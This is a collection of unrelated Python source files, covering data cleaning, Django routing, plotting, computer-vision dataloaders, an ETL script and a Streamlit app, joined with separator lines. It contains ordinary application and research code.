return newsbox
'''
dt=datetime.datetime.now()
today=str(dt)
today1=today[0:10]
today2=today[0:10].replace("-",".")
print(SWedu(today1)) # 사업단 공지사
print(KIC(today)) #국제대학 공지사항
print(SoftwareKHU(today))#소프트웨어 중심대학 공지사항
'''
|
import logging
from logging.handlers import (RotatingFileHandler,
QueueHandler,
QueueListener)
from fansettings import LOG_PATH
f = logging.Formatter('%(asctime)s: %(name)s|%(processName)s|%(process)s|%(levelname)s -- %(message)s')
def getFanLogger(name=None, level=logging.INFO):
if name is None:
name = __name__
log = logging.getLogger(name)
log.setLevel(level)
log.propagate = False
return log
def getFanListener(q, name=None, level=logging.INFO):
if name is None:
name = __name__
log = getFanLogger(name, level)
fh = RotatingFileHandler(LOG_PATH, maxBytes=8192, backupCount=5)
fh.setFormatter(f)
fh.setLevel(level)
listener = logging.handlers.QueueListener(q, fh)
log.addHandler(listener)
return log
def getFanHandler(q, name=None, level=logging.INFO):
if name is None:
name = __name__
log = getFanLogger(name, level)
qh = logging.handlers.QueueHandler(q)
qh.setFormatter(f)
log.addHandler(qh)
return log
|
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 15 16:00:47 2017
@author: lcao
"""
import pandas as pd
import numpy as np
import os
import re
# set working directory
os.chdir('D:\Personal\Hackathon\WeiboSum')
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# import statistical data of weibo
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
weibo_stat_1 = pd.read_csv('WeiboStat\Weibo_Stat_1.csv')
weibo_stat_2 = pd.read_csv('WeiboStat\Weibo_Stat_2.csv')
weibo_stat = weibo_stat_1.append(weibo_stat_2)
print weibo_stat_1.shape
print weibo_stat_2.shape
print weibo_stat.shape
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# clean statistical data of weibo
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
weibo_stat.head(1)
# check number of unique funds to detect duplicates
print len(weibo_stat.User_name.values)
'''
check number of NaN
check with WeiboSpyderImplement.py again to see if we can retrieve data from weibo
If not, remove null fund names from weibo_stat
'''
idx = np.where(np.array(pd.isnull(weibo_stat.User_name))==True)[0]
print len(idx)
Users_id = np.array(weibo_stat.iloc[idx]['User_id'])
'''
replace NaN data if new data is retrieved
'''
weibo_stat_3 = pd.read_csv('WeiboStat\Weibo_Stat_3.csv')
for i in range(weibo_stat_3.shape[0]):
user_id = weibo_stat_3.User_id.iloc[i]
weibo_stat.iloc[np.where(np.array(weibo_stat['User_id'])==user_id)[0][0]] = weibo_stat_3.iloc[i]
weibo_stat = weibo_stat.loc[[not x for x in pd.isnull(weibo_stat.User_name)]]
print weibo_stat.shape
'''
check number of fund names end with numbers (suspicious)
check if these user ids are institution ids
'''
M = [re.search(ur'\d+$', x) for x in np.array(weibo_stat.User_name)]
B = [m is None for m in M]
weibo_stat = weibo_stat.ix[B]
print weibo_stat.shape
'''
append fund name to weibo_stat
'''
weibo_user_id1 = pd.read_csv('WeiboStat\Weibo_users_id_1.csv')
weibo_user_id2 = pd.read_csv('WeiboStat\Weibo_users_id_2.csv')
weibo_user_id = weibo_user_id1.append(weibo_user_id2)
print weibo_user_id1.shape
print weibo_user_id2.shape
print weibo_user_id.shape
# left outer join weibo_stat and weibo_user_id by user_id
temp = pd.merge(weibo_stat,weibo_user_id[['User_id','Fund_name']],how='left',on='User_id')
temp.head(1)
temp.shape
temp.drop(temp.columns[0], axis=1, inplace=True)
temp.to_csv('WeiboStat\Weibo_Stat.csv', index = False)
|
from django.urls import path
from django.conf.urls import include, url
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('view/', views.handle_view_file, name='view'),
path('upload/', views.handle_file_upload, name='upload'),
path('risk/', views.handle_column_select, name='risk'),
url(r'^delete/(?P<token>\w+)/$', views.delete_file, name='delete_file'),
]
|
/home/alex/ScienceWork/SUFEX-Kinetics/Calorimetry/Plot/Integrate-Exp-Data.py
|
import tkinter as tk
from tkinter import filedialog as fd
import numpy as np
from fields_analyzer.json_reader import read_json_file
from fields_analyzer.fields_analyzer import select_fields_to_analyze
from algorithm.K_Means import K_Means
from results_and_plotter.clusters_results import cluster_results
from results_and_plotter.results_output import plotter
from results_and_plotter.save_results import save_results,load_results
class App(tk.Tk):
def __init__(self):
super().__init__()
self.size = '500x300'
# configure the root window
self.title('Data Clustering Analyzer')
self.geometry(self.size)
# label
self.label = tk.Label(self, text='Please select the JSON file where the data to analyze is')
self.label.pack( padx=10, pady=10)
# button
self.button = tk.Button(self, text='Browse..', command=self.browse_data)
self.button.pack( padx=10, pady=10)
# label
self.label = tk.Label(self, text='Or load a previous execution, entering the identifier')
self.label.pack(padx=10, pady=10)
self.label = tk.Label(self, text="Identifier")
self.label.pack()
self.entry2 = tk.Entry(self, )
self.entry2.pack()
# button
self.button1 = tk.Button(self, text='Load..', command=self.load_data)
self.button1.pack(padx=10, pady=10)
# check_box
self.save_exe = 0
self.checkbox = tk.Checkbutton(self, text="Save execution", variable=self.save_exe, onvalue=1, offvalue=0,
command=self.isChecked)
self.checkbox.pack( padx=10, pady=10)
self.label = tk.Label(self,text = "Identifier")
self.entry = tk.Entry(self, )
def isChecked(self):
if self.save_exe == 1:
self.save_exe = 0
self.entry.pack_forget()
self.label.pack_forget()
else:
self.save_exe = 1
self.entry.pack()
self.label.pack()
# here we browse the json file and then call the json reader.
def browse_data(self):
filetypes = (
('text files', '*.json'),
('All files', '*.*')
)
filename = fd.askopenfilename(
title='Open JSON file',
initialdir='/home/dnavarro/PycharmProjects/k_means_clustering/data',
filetypes=filetypes)
json_data = read_json_file(filename)
samples_to_analyze, pids_array = select_fields_to_analyze(json_data)
set_to_plot, alive_indexes = np.unique(samples_to_analyze, axis=0, return_index=True)
K_Means_ = K_Means(K=7, max_iterations=150)
pred = K_Means_.predict(samples_to_analyze)
if self.save_exe == 1:
save_results(self.entry.get(),pred.astype(int), set_to_plot, alive_indexes, samples_to_analyze, pids_array)
cluster_results(pred.astype(int), pids_array)
plotter(pred.astype(int), set_to_plot, alive_indexes)
def load_data(self):
if len(self.entry2.get()) > 0:
dp = load_results(self.entry2.get())
cluster_results(dp["pred"], dp["pids_array"])
plotter(dp["clusters"], dp["set_to_plot"], dp["alive_indexes"])
|
a = input().split()
result = ''
for i in range(len(a)):
if len(a) == 1:
result += a[i]
else:
if i != len(a) - 1:
t = int(a[i - 1]) + int(a[i + 1])
result += str(t) + " "
else:
t = int(a[i - 1]) + int(a[0])
result += str(t)
print(result)
|
# Generated by Django 3.0.5 on 2020-08-13 10:42
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('authentication', '0005_auto_20200813_1014'),
]
operations = [
migrations.RenameField(
model_name='attendance',
old_name='logindate',
new_name='login',
),
migrations.RenameField(
model_name='attendance',
old_name='logoutdate',
new_name='logout',
),
migrations.RemoveField(
model_name='attendance',
name='logintime',
),
migrations.RemoveField(
model_name='attendance',
name='logouttime',
),
]
|
#Respuestas por defecto
# -*- coding: latin-1 -*-
opciones = {
"users": {"Pablo Marinozi","Facundo Bromberg","Diego Sebastián Pérez","Carlos Ariel Díaz","Wenceslao Villegas","Juan Manuel López Correa"},
"inclusion_criteria": ("El estudio utiliza algún proceso de extracción de información automatizado sobre imágenes de cualquier región del espectro electromagnético en alguna de sus etapas.",
"El estudio se enfoca en la medición de variables de interés vitícola indistintamente de la ubicación geográfica y el sistema de conducción de los viñedos y del varietal y propósito de comercialización de las uvas."),
"exclusion_criteria": ("El estudio utiliza como entrada imágenes satelitales.",
"El algoritmo opera sobre información electromagnética que no viene en forma de imagen (entiéndase representación visual bidimensional a partir de una matriz numérica) ",
"El paper está orientado a automatismo de la gestión, no a medición de variables.",
"El estudio no está escrito en Inglés.",
"La publicación del estudio no se sometió a un proceso de revisión por pares."),
"dataset_format_list" : {"Fotografías Aisladas", "Fotogramas de videos"},
"viticultural_objects_list" : {"Bayas (Racimos)", "Bayas (Granos)", "Hojas (Individuales)", "Hojas (Canopia)",
"Yemas", "Tronco"},
"data_capture_conditions_list" : {"Condiciones naturales de campo", "Condiciones controladas en el campo",
"Condiciones controladas en el laboratorio"},
"electromagnetic_spectrum_list" : {"Espectro Visible", "Infrarrojo", "Multiespectral", "Hiperespectral"},
"camera_types_list" : {"Monocular", "Stereo", "Profundidad"},
"visual_tasks_list" : {
"Segmentación 2D de objetos de interés.",
"Detección 2D de objetos de interés (bounding box)",
"Detección 2D de objetos de interés (centro de masa)",
"Detección 2D de objetos de interés (máscara del objeto 2D)",
"Detección 3D de objetos de interés (bounding box)",
"Detección 3D de objetos de interés (centro de masa)",
"Detección 3D de objetos de interés (máscara del objeto 3D)",
"Reconstrucción 3D de objetos de interés.",
"Identificación/Diferenciación 2D/3D de instancias de objeto de interés.",
"Tracking de objetos de interés"},
"visual_features_types": {"Handcrafted", "Latent", "Deep"},
"visual_features_handcrafted_list" : {
"Máscaras de Textura de Laws",
"Filtros de Gabor",
"SGF (Steerable Gaussian Filter)",
"Histogramas de color",
"CCV (Color Coherence Vector)",
"Histogramas de Momentos de Color",
"CC (Color Correlogram)",
"GCM (Gray-level Co-occurrence Matrix)",
"Contexto de Forma (Shape Context)",
"Momentos Geométricos",
"HOG (Histogram of Oriented Gradients)",
"SIFT (Scale-Invariant Feature Transform)",
"SURF (Speeded-Up Robust Features)",
"ORB (Oriented FAST and rotated BRIEF)"},
"visual_features_latent_list" : {
"PCA (Principal Component Analysis)",
"Kernel PCA (Kernel Principal Component Analysis)",
"MDS (Multidimensional Scaling",
"Isomap",
"Laplacian Eigenmaps"},
"visual_features_deep_list" : {
"AlexNet",
"VGG group",
"LeNet",
"GoogleNet",
"Inception"},
"algorithms_list" : {"SVM (Support Vector Machines)", "Multilayer Perceptron"},
"viticultural_variable_list" : {
"Flower number",
"Berry maturity",
"Berry number",
"Berry weight" ,
"Berry size",
"Berry volume",
"Cluster compactness (density)",
"Cluster morphology (length, width, size, elongation)",
"Cluster volume",
"Cluster number",
"Cluster weight",
"Yield",
"Leaf Area"},
"viticultural_aspects_list" : {
"Información cuantitativa de la producción",
"Calidad de la producción",
"Estado general del viñedo"},
"research_goal_list" : {
"Disminuir costos en procesos productivos.",
"Reducir la laboriosidad de las tareas manuales llevadas adelante por el personal.",
"Posibilitar las mediciones actuales en escala masiva/mayor granularidad espacio-temporal.",
"Posibilitar la medición de variables más complejas/sutiles que las actuales."},
"practical_contibution_list" : {
"Producto terminado de código abierto.",
"Producto terminado privativo.",
"Implementación de código abierto de los modelos de CV",
"Ninguna de las anteriores."}
}
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 17:23:19 2019
@author: HP
"""
def Extended_Euclidean(a,b):
if b==0:
return 1,0,a
else:
m,n,gcd1=Extended_Euclidean(b,a%b)
x=n
y=m-int(a/b)*n
gcd=gcd1
return x,y,gcd
print(Extended_Euclidean(10,7))
|
from sqlalchemy import (
Column,
DateTime,
Integer,
Numeric,
String,
UniqueConstraint,
and_
)
from sqlalchemy.orm import relationship, synonym
from bitcoin_acks.constants import ReviewDecision
from bitcoin_acks.database.base import Base
from bitcoin_acks.models import Comments, Labels
from bitcoin_acks.models.pull_requests_labels import PullRequestsLabels
from bitcoin_acks.models.users import Users
class PullRequests(Base):
__tablename__ = 'pull_requests'
__table_args__ = (UniqueConstraint('number',
'repository_id',
name='pull_requests_unique_constraint'),
)
id = Column(String, primary_key=True)
number = Column(Numeric, nullable=False)
is_high_priority = Column(DateTime)
added_to_high_priority = Column(DateTime)
removed_from_high_priority = Column(DateTime)
additions = Column(Integer)
deletions = Column(Integer)
mergeable = Column(String)
last_commit_state = Column(String)
last_commit_state_description = Column(String)
last_commit_short_hash = Column(String)
last_commit_pushed_date = Column(DateTime(timezone=True))
state = Column(String, nullable=False)
title = Column(String, nullable=False)
body = Column(String)
created_at = Column(DateTime(timezone=True), nullable=False)
updated_at = Column(DateTime(timezone=True), nullable=False)
merged_at = Column(DateTime(timezone=True))
closed_at = Column(DateTime(timezone=True))
commit_count = Column(Integer)
review_decisions_count = Column(Integer, default=0)
total_bounty_amount = Column(Integer)
bodyHTML = synonym('body')
createdAt = synonym('created_at')
updatedAt = synonym('updated_at')
mergedAt = synonym('merged_at')
closedAt = synonym('closed_at')
repository_id = Column(Integer, nullable=False)
author_id = Column(String)
tweet_id = Column(Integer, unique=True)
toot_id = Column(Integer, unique=True)
author = relationship(Users,
primaryjoin=author_id == Users.id,
foreign_keys='[PullRequests.author_id]',
backref='pull_requests'
)
review_decisions = relationship(Comments,
primaryjoin=and_(
id == Comments.pull_request_id,
Comments.review_decision != ReviewDecision.NONE,
Comments.author_id != author_id
),
foreign_keys='[Comments.pull_request_id]',
order_by=Comments.published_at.desc())
labels = relationship(Labels,
secondary=PullRequestsLabels.__table__,
primaryjoin=id == PullRequestsLabels.pull_request_id,
secondaryjoin=PullRequestsLabels.label_id == Labels.id,
# foreign_keys='[Labels.pull_request_id]',
backref='pull_request',
order_by=Labels.name)
@property
def html_url(self):
url = 'https://github.com/bitcoin/bitcoin/pull/{0}'
return url.format(self.number)
def __repr__(self):
return f'{self.number} {self.title}'
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 28 13:00:48 2019
@author: Ananthan
"""
import numpy as np
import seaborn as sns
import matplotlib.pylab as plt
import pandas
#works well for 675 input files, but will give poor labels for many more or less.
def plot_heat_map(matrix,path, title):
# height = plt.rcParams['font.size'] * matrix.shape[0] / 10
# width = plt.rcParams['font.size'] * matrix.shape[1] / 10
sns.set(font_scale=0.0035)
fig, ax = plt.subplots(figsize=(2^15, 2^15))
# p=sns.heatmap(matrix,vmin= 0.0, vmax = 1.0, linewidths=0.0, square=True, xticklabels=True, yticklabels=True).set_title(title)
p=sns.heatmap(matrix,linewidths=0.0, square=True, xticklabels=True, yticklabels=True).set_title(title)
p.figure.savefig(path, bbox_inches='tight')
plt.clf()
def run_plots(PLOTPATHS):
for matname in PLOTPATHS:
m = pandas.read_csv(matname, index_col=0)
plot_heat_map(m, matname[:-4] + "_heat.pdf", matname[:-4])
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Python script used to filter the list of junit XML test results
# to those that contain errors or failures.
#
#!/usr/bin/python
import sys
import fileinput
import xml.etree.ElementTree
for line in fileinput.input():
suite = xml.etree.ElementTree.parse(line.rstrip()).getroot()
errors = suite.get("errors")
failures = suite.get("failures")
if (errors is not None and int(errors) > 0) or (failures is not None and int(failures) > 0):
sys.stdout.write(line)
sys.exit(0)
|
import os
from matplotlib import pyplot as plt
from shapely.geometry import Point
import cv2
import numpy as np
from objects.constants import Constants
from objects.homography import Homography
from objects.images import TestImage, TemplateImage
from objects.plot_discarded import PlotDiscarded
default_backend = None
def setup_backend():
if os.uname()[0] == 'Linux':
import matplotlib
matplotlib.use('TkAgg')
def setup_backend_for_saving():
global default_backend
import matplotlib
default_backend = matplotlib.get_backend()
matplotlib.use('Agg')
def restore_backend():
global default_backend
import matplotlib
matplotlib.use(default_backend)
def __get_path(name):
n = name.lower().replace(' ', '_')
path = Constants.SAVING_FOLDER_PATH + '/' + n
if not os.path.exists(path):
os.mkdir(path)
return path
def save_homographies(test_image: TestImage, homographies: [Homography], template: TemplateImage = None,
before_overlap=False, before_filters=False):
plt.clf()
if before_filters:
plt.imshow(test_image)
else:
plt.imshow(test_image.image)
if template is not None:
name = template.name.upper()
title = 'Show all items found in template {}'.format(name)
save = '/Show_items_found_in_template_{}.png'.format(name)
elif before_overlap:
title = 'Show all items found before overlap removing'
save = '/Show_all_items_found_before_overlap_removing.png'
elif before_filters:
title = 'Show all items found before filters'
save = '/Show_all_items_found_before_filters.png'
else:
title = 'Show all items found'
save = '/Show_items_found.png'
plt.title(title)
for homography in homographies:
x, y = homography.polygon.exterior.xy
plt.plot(x, y, linewidth=2, color='r')
x_c, y_c = homography.polygon.centroid.coords.xy
x_c = round(x_c[0])
y_c = round(y_c[0])
# plt.text(x_c, y_c, homography.template.name + "-" + str(homography.id_hom_global), horizontalalignment='center',
# verticalalignment='center', fontsize=4, bbox=dict(facecolor='white', alpha=0.5))
plt.savefig(Constants.SAVING_FOLDER_PATH + save, dpi=400, format='png')
def save_homographies_for_template(test_image: TestImage, homographies: [Homography]):
homographies_dict = {}
for homography in homographies:
name = homography.template.name
if name not in homographies_dict:
homographies_dict[name] = []
homographies_dict[name].append(homography)
for k, v in homographies_dict.items():
for homography in v:
plt.clf()
plt.imshow(test_image.image)
name = k.upper()
iid = str(homography.id_hom_global)
iid = iid.replace('.', '-')
title = 'Show all items found in template after filters {}-{}'.format(name, iid)
save = '/Show_items_found_in_template_{}_after_filters_{}.png'.format(name, iid)
plt.title(title)
x, y = homography.polygon.exterior.xy
plt.plot(x, y, linewidth=2, color='r')
x_c, y_c = homography.polygon.centroid.coords.xy
x_c = round(x_c[0])
y_c = round(y_c[0])
plt.text(x_c, y_c, homography.template.name + "-" + str(homography.id_hom_global),
horizontalalignment='center',
verticalalignment='center', fontsize=4, bbox=dict(facecolor='white', alpha=0.5))
plt.savefig(Constants.SAVING_FOLDER_PATH + save, dpi=400, format='png')
def save_homographies_report(test_image, homographies: [Homography]):
plt.clf()
fig = plt.figure(constrained_layout=False)
gs = fig.add_gridspec(nrows=3, ncols=4)
ax1 = fig.add_subplot(gs[:-1, 0])
ax2 = fig.add_subplot(gs[-1, 0])
ax3 = fig.add_subplot(gs[:, 1:])
axs = [ax1, ax2, ax3]
# fig, axs = plt.subplots(1, 3)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
for i, homography in enumerate(homographies):
axs[i].imshow(homography.template.image)
x, y = homography.polygon.exterior.xy
if homography.template.name == 'CIOCCOLATO_FONDENTE':
color = 'r'
label = 'Chocolate'
else:
color = 'b'
label = 'Special-k'
axs[i].set_title(label)
axs[2].imshow(test_image.image)
axs[2].set_title('Items found')
axs[2].plot(x, y, linewidth=2, color=color, label=label)
axs[2].legend(loc='lower center')
plt.savefig(Constants.SAVING_FOLDER_PATH + '/Show_all_items_report.png', dpi=400, format='png')
def save_keypoints_report(good_matches, test_keypoints, image, name):
# test_image.image, good_matches, test_keypoints, hotpoints_image_after_elaboration, template.name
# test, good_matches, keypoints, hotpoint, name
keypoints_mask = np.ones(image.shape, dtype=np.uint8) * 255
good_keypoints = []
for good_match in good_matches:
dst_pt = test_keypoints[good_match.queryIdx]
good_keypoints.append(dst_pt)
test_keypoints_image = cv2.drawKeypoints(keypoints_mask, good_keypoints, None)
path = __get_path(name)
plt.clf()
fig, axs = plt.subplots(1, 2)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
# fig.suptitle('Hotpoints')
axs[0].imshow(image)
axs[1].imshow(test_keypoints_image, cmap='Greys')
save = path + '/Keypoints_report.png'
plt.savefig(save, dpi=400, format='png')
def save_hotpoints(image, name, again=False):
path = __get_path(name)
plt.clf()
plt.imshow(image, cmap='Greys')
if again:
title = 'Hotpoints recomputed'
save = path + '/Hotpoints_again.png'
else:
title = 'Hotpoints'
save = path + '/Hotpoints.png'
plt.title(title)
plt.savefig(save, dpi=400, format='png')
def save_hotpoints_report(test, good_matches, keypoints, hotpoint, name):
keypoints_mask = np.ones(test.shape, dtype=np.uint8) * 255
good_keypoints = []
for good_match in good_matches:
dst_pt = keypoints[good_match.queryIdx]
good_keypoints.append(dst_pt)
test_keypoints_image = cv2.drawKeypoints(keypoints_mask, good_keypoints, None)
path = __get_path(name)
plt.clf()
fig, axs = plt.subplots(1, 3)
for ax in axs:
ax.set_xticks([], [])
ax.set_yticks([], [])
# fig.suptitle('Hotpoints')
axs[0].imshow(test)
axs[1].imshow(test_keypoints_image, cmap='Greys')
axs[2].imshow(hotpoint, cmap='Greys')
save = path + '/Hotpoints_report.png'
plt.savefig(save, dpi=400, format='png')
def save_window(test_image, id_hotpoint, id_pos, id_homography, window, inliers_matches, test_keypoints, name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Window keypoints inside".format(id_hotpoint, id_pos, id_homography))
# Plot window
x, y = window.exterior.xy
plt.plot(x, y, linewidth=1, color='g')
# Plot inliers
for i, match in enumerate(inliers_matches):
point = Point(test_keypoints[match.queryIdx].pt)
x, y = point.x, point.y
if window.contains(point):
plt.scatter(x, y, c='r', s=2, marker='x')
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (a) Window keypoints inside.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_two_polygons(test_image, id_hotpoint, id_pos, id_homography, object_polygon1, object_polygon2, name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Compare polygons".format(id_hotpoint, id_pos, id_homography))
try:
x, y = object_polygon1.exterior.xy
except:
x = []
y = []
plt.plot(x, y, linewidth=3, color='r')
try:
x, y = object_polygon2.exterior.xy
except:
x = []
y = []
plt.plot(x, y, linewidth=2, color='b')
plt.legend(['BEFORE', 'AFTER'])
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (b) Compare polygons.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_inliers(test_image, id_hotpoint, id_pos, id_homography, object_polygon_found, inliers_found, test_keypoints,
name):
plt.clf()
plt.imshow(test_image)
plt.title("{}.{}.{} Inliers".format(id_hotpoint, id_pos, id_homography))
x, y = object_polygon_found.exterior.xy
plt.plot(x, y, linewidth=3, color='g')
for match in inliers_found:
point = Point(test_keypoints[match.queryIdx].pt)
x, y = point.x, point.y
plt.scatter(x, y, c='r', s=2, marker='x')
path = __get_path(name)
plt.savefig(path + "/{}.{}.{} (c) Inliers.png".format(id_hotpoint, id_pos, id_homography),
dpi=400, format="png")
def save_discarded_homography(object_polygon, name, idd, text_title, text_label):
x, y = object_polygon.exterior.xy
title = "HOMOGRAPHY DISCARDED " + text_title
path = __get_path(name)
return PlotDiscarded(x, y, title, path, idd, text_label)
|
import numpy as np
import torch
import cv2
import os
import os
import glob
from photometric_augumentation import *
from homography_transform import *
def space_to_depth(inp, grid):
if len(inp.shape) is not 2:
raise ShapeError("input should be 2D-Tensor")
h, w = inp.shape[0], inp.shape[1]
hc = h // grid
wc = w // grid
oup = inp.reshape(hc, grid, wc, grid)
oup = oup.permute(0, 2, 1, 3)
oup = oup.reshape(hc, wc, grid*grid)
return oup
class Dataloader(object):
def __init__(self, root):
self.root = root
self.dataset = []
def get_dataset(self, types):
dirs = os.listdir(self.root)
for dir in dirs:
images = self.root + '/' + dir + '/' + 'images'
points = self.root + '/' + dir + '/' + 'points'
images_training = images + '/' + types
points_training = points + '/' + types
for image in glob.glob(images_training + '/*.png'):
dicts = {}
dicts['image'] = image
dicts['point'] = points_training + '/' + image.split('.')[0].split('/')[-1] + '.npy'
self.dataset.append(dicts)
random.shuffle(self.dataset)
def photometric_augmentation(self, image):
noise_image = image.copy()
#noise_image = cv2.GaussianBlur(noise_image, (21, 21), 0)
noise_image = random_brightness(noise_image)
noise_image = random_contrast(noise_image)
noise_image = additive_gaussian_noise(noise_image)
noise_image = additive_speckle_noise(noise_image)
noise_image = add_shade(noise_image)
noise_image = add_fog(noise_image)
noise_image = motion_blur(noise_image)
return noise_image
def process_label(self, points, H, W):
points = points.astype('int')
label = np.zeros((H, W),int)
label[points[:, 0], points[:, 1]] = 1
label = torch.from_numpy(label).float()
label = space_to_depth(label, 8)
label = torch.cat([2*label,
torch.ones(label.shape[0],
label.shape[1], 1)], 2)
label = torch.argmax(label, 2).unsqueeze(0).cuda()
return label
def compute_validmask(self, H, W, homography=None, border=4):
mask = np.ones((H-2*border, W-2*border))
mask = cv2.copyMakeBorder(mask,border,border,border,border,cv2.BORDER_CONSTANT,value=0)
if homography is not None:
mask = cv2.warpPerspective(mask, homography, (W, H), cv2.INTER_NEAREST)
return mask
def pre_process(self, image):
H, W = image.shape[0], image.shape[1]
inp = image.copy()
inp = inp.astype('float')/255.0
inp = torch.from_numpy(inp)
inp = inp.reshape(1, 1, H, W)
inp = inp.cuda().float()
return inp
def load(self, index):
sub_dict = self.dataset[index]
image = cv2.imread(sub_dict['image'],0)
image = cv2.resize(image, (320, 240))
H, W = image.shape[0], image.shape[1]
homography1 = sample_homography(H, W)
homography2 = sample_homography(H, W)
image1 = self.photometric_augmentation(image)
image2 = self.photometric_augmentation(image)
image1 = cv2.warpPerspective(image1, homography1, (W, H))
image2 = cv2.warpPerspective(image2, homography2, (W, H))
mask1 = self.compute_validmask(H, W, homography1)
mask2 = self.compute_validmask(H, W, homography2)
inps = torch.cat((self.pre_process(image1),
self.pre_process(image2)), dim=0)
points = np.load(sub_dict['point'])
if points.shape[0] is not 0:
points =2*points
points1 = warp_points(points, homography1, H, W)
points2 = warp_points(points, homography2, H, W)
label1 = self.process_label(points1, H, W)
label2 = self.process_label(points2, H, W)
labels = torch.cat((label1, label2), dim=0)
else:
labels = torch.empty(2, H//8, W//8)
labels = labels.fill_(64).cuda()
mask1 = space_to_depth(torch.from_numpy(mask1), 8)
mask2 = space_to_depth(torch.from_numpy(mask2), 8)
mask1 = mask1.bool().any(dim=2).float()
mask2 = mask2.bool().any(dim=2).float()
valid_mask = torch.cat((mask1.unsqueeze(0), mask2.unsqueeze(0)), dim=0)
valid_mask = valid_mask.cuda().float()
labels = labels.long()
return inps, labels, valid_mask
|
import os
import shutil
import StringIO
import urlparse
import zipfile
import requests
VERSION = '0.8'
GITHUB_URL = 'https://github.com/NLeSC/ShiCo/archive/v{}.zip'.format(VERSION)
STATIC_DIR = 'texcavator/static/js/'
DIST = 'ShiCo-{}/webapp/dist/'.format(VERSION)
DIST_DIR = os.path.join(STATIC_DIR, DIST)
FINAL_DIR = os.path.join(STATIC_DIR, 'ShiCo')
# Retrieve the archive from GitHub
print 'Retrieving the archive...'
r = requests.get(GITHUB_URL, stream=True)
z = zipfile.ZipFile(StringIO.StringIO(r.content))
# Extract files from the DIST_DIR to the STATIC_DIR
print 'Unpacking...'
for f in z.namelist():
if f.startswith(DIST):
z.extract(f, STATIC_DIR)
# Move the files to the ShiCo folder
print 'Moving to ShiCo folder...'
shutil.rmtree(FINAL_DIR, ignore_errors=True)
shutil.move(DIST_DIR, STATIC_DIR)
os.rename(os.path.join(STATIC_DIR, 'dist'), FINAL_DIR)
shutil.rmtree(os.path.join(STATIC_DIR, 'ShiCo-{}'.format(VERSION)))
# Replace relative paths with absolute paths
print 'Replacing paths...'
with open(os.path.join(FINAL_DIR, 'scripts/app.js'), 'r+') as f:
lines = []
for line in f:
line = line.replace('config.json', urlparse.urljoin('/static/js/ShiCo/', 'config.json'))
line = line.replace('/help/', urlparse.urljoin('/static/js/ShiCo/', 'help/'))
lines.append(line)
f.seek(0)
f.truncate()
for line in lines:
f.write(line)
|
# coding: utf-8
import os.path as osp
import pandas as pd
from ddf_utils.io import open_google_spreadsheet, serve_datapoint, dump_json
from ddf_utils.str import to_concept_id
from ddf_utils.package import get_datapackage
DOCID = '1hhTERVDWDyZh-efUPtMrcdUYWzXBlIbrOIhZwegXSi8'
SHEET = 'data-for-countries-etc-by-year'
DIMENSIONS = ['geo', 'time']
OUT_DIR = '../../'
COLUMN_TO_CONCEPT = {'Gini': 'gapminder_gini'}
def gen_datapoints(df_: pd.DataFrame):
df = df_.copy()
df = df.set_index(DIMENSIONS).drop('name', axis=1) # set index and drop column 'name'
for c in df:
yield (c, df[[c]])
def create_geo_domain(df: pd.DataFrame) -> pd.DataFrame:
return df[['geo', 'name']].drop_duplicates()
def main():
print('running etl...')
data = pd.read_excel(open_google_spreadsheet(DOCID), sheet_name=SHEET)
measures = list()
for c, df in gen_datapoints(data):
c_id = COLUMN_TO_CONCEPT[c]
df.columns = [c_id]
serve_datapoint(df, OUT_DIR, c_id)
measures.append((c_id, c))
measures_df = pd.DataFrame(measures, columns=['concept', 'name'])
measures_df['concept_type'] = 'measure'
dimensions_df = pd.DataFrame.from_dict(
dict(concept=DIMENSIONS,
name=list(map(str.title, DIMENSIONS)),
concept_type=['entity_domain', 'time'])
)
others_df = pd.DataFrame.from_dict(
dict(concept=['name'],
name=['name'],
concept_type=['string'])
)
(pd.concat([measures_df, dimensions_df, others_df], ignore_index=True)
.to_csv(osp.join(OUT_DIR, 'ddf--concepts.csv'), index=False))
geo_df = create_geo_domain(data)
geo_df.to_csv(osp.join(OUT_DIR, 'ddf--entities--geo.csv'), index=False)
# datapackage
dump_json(osp.join(OUT_DIR, 'datapackage.json'), get_datapackage(OUT_DIR, update=True))
if __name__ == '__main__':
main()
print('Done.')
|
"""
This is a web app created with Streamlit to host this project. Feel free to use this file as a guide or visit my
article on the topic (linked below).
"""
import streamlit as st
import pandas as pd
import numpy as np
import pickle
from PIL import Image
from sklearn.linear_model import LogisticRegressionCV
st.header("Predicting Diabetes Rehospitalizations")
st.write("""
Created by Aren Carpenter
This is a Streamlit web app created so users could explore my multiple logistic regression model predicting the need for
rehospitalization of diabetic patients based on a numnber of electronic health records (EHR).
This [data](https://data.world/uci/diabetes-130-us-hospitals-for-years-1999-2008) was collected from diabetic
patients from 1998 - 2008 and only consists of inpatient hospitalizations lasting at least 1 day. There are about
100,000 observations.
Use the sidebar to select input features. Each feature defaults to its mean or mode, as appropriate.
""")
st.sidebar.header('User Input Features')
def user_input_features():
